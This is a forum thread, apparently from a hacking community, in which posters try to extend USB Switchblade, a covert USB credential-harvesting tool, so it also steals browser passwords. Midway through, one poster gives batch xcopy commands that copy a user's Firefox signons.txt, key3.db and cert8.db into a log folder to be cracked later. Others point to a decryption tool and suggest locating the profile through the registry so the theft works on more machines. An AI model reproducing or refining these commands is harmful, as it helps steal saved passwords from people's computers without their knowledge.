Use Multi Password Recovery in Switchblade?!

herman

Hi!

Just found out about USB Switchblade and when i used it i come to think about Multi Password Recovery which can be found here http://passrecovery.com/. MPR can find out ALOT(way more than Switchblade) of passwords on a computer so why not try to use MPR in Switchblade? If someone could fix a Switchblade version with Multi Password Recovery in it, I and probably the most of you would live happily ever after.

Just my 2 cents!

Hi!

Just found out about USB Switchblade and when i used it i come to think about Multi Password Recovery which can be found here http://passrecovery.com/. MPR can find out ALOT(way more than Switchblade) of passwords on a computer so why not try to use MPR in Switchblade? If someone could fix a Switchblade version with Multi Password Recovery in it, I and probably the most of you would live happily ever after.

Just my 2 cents!

Because it doesn't give you anything unless you "register" for 30 bucks.

Hi!

Just my 2 cents!

Because it doesn't give you anything unless you "register" for 30 bucks.

Which makes me wonder if this is spam

So it´s not possible to include it even if you register it? Lets say I buy the program, is it possible to include it in Switchblade? MPR finds usernames and passwords of visited sites in firefox/opera/IE which would be enough to include. There are no other program that reveals this?

But there must be some easier way to find and store usernames and passwords saved by Firefox/Opera/IE? I mean they must be stored somewhere and be able to be cracked? Now I can only see very few of my saved passwords in the logfile.

Guest Twilight Zone
for ff, just use firepassword, or copy the key3.db and signons.txt from your profile folder, and crack them at home. Not sure about the other browsers, because I don't use them.

ok,I make this

::FireFox Passwords

mkdir documentslogfiles%computername%FireFox

xcopy "C:Documents and Settings%username%Application DataMozillaFirefoxProfiles*.default*signons.txt" "documentslogfiles%computername%FireFox" /s /c /q /r /h /y

xcopy "C:Documents and Settings%username%Application DataMozillaFirefoxProfiles*.default*key3.db" "documentslogfiles%computername%FireFox" /s /c /q /r /h /y

xcopy "C:Documents and Settings%username%Application DataMozillaFirefoxProfiles*.default*cert8.db" "documentslogfiles%computername%FireFox" /s /c /q /r /h /y

how to decrypt/crack files after slurping?

for ff, just use firepassword, or copy the key3.db and signons.txt from your profile folder, and crack them at home. Not sure about the other browsers, because I don't use them.

ok,I make this

::FireFox Passwords

mkdir documentslogfiles%computername%FireFox

xcopy "C:Documents and Settings%username%Application DataMozillaFirefoxProfiles*.default*signons.txt" "documentslogfiles%computername%FireFox" /s /c /q /r /h /y

xcopy "C:Documents and Settings%username%Application DataMozillaFirefoxProfiles*.default*key3.db" "documentslogfiles%computername%FireFox" /s /c /q /r /h /y

how to decrypt/crack files after slurping?

Use this program http://nagmatrix.50webs.com/article_firepassword.html. After you get it to work, please post how you did so others can do the same.

Herman

Guest Twilight Zone

I try , and got the same message like before :

Error : Firefox profile directory does not exist..

You have entered profile path = [C:Documents and SettingsTwilight ZoneApplication DataMozillaFirefoxProfiles*.default" ]

I unpack program in the folder with other files,CMD ,I'm not shure how to use this.Maybe Remkow and Spektormax can try this ?

Instead of going to a specific folder, you can search the registry for where it is installed, and then point it there. That would work on more systems. Just a thought. My "main" drive is E: not C: :twisted: screws up a lot of spyware.

Instead of going to a specific folder, you can search the registry for where it is installed, and then point it there. That would work on more systems. Just a thought. My "main" drive is E: not C: :twisted: screws up a lot of spyware.

How can this be done? I mena how can programs like MPR find out firefox passwords? I doesn't see how this task can be very hard for people who've developed USB Switchblade? This would improve it soo much.

Herman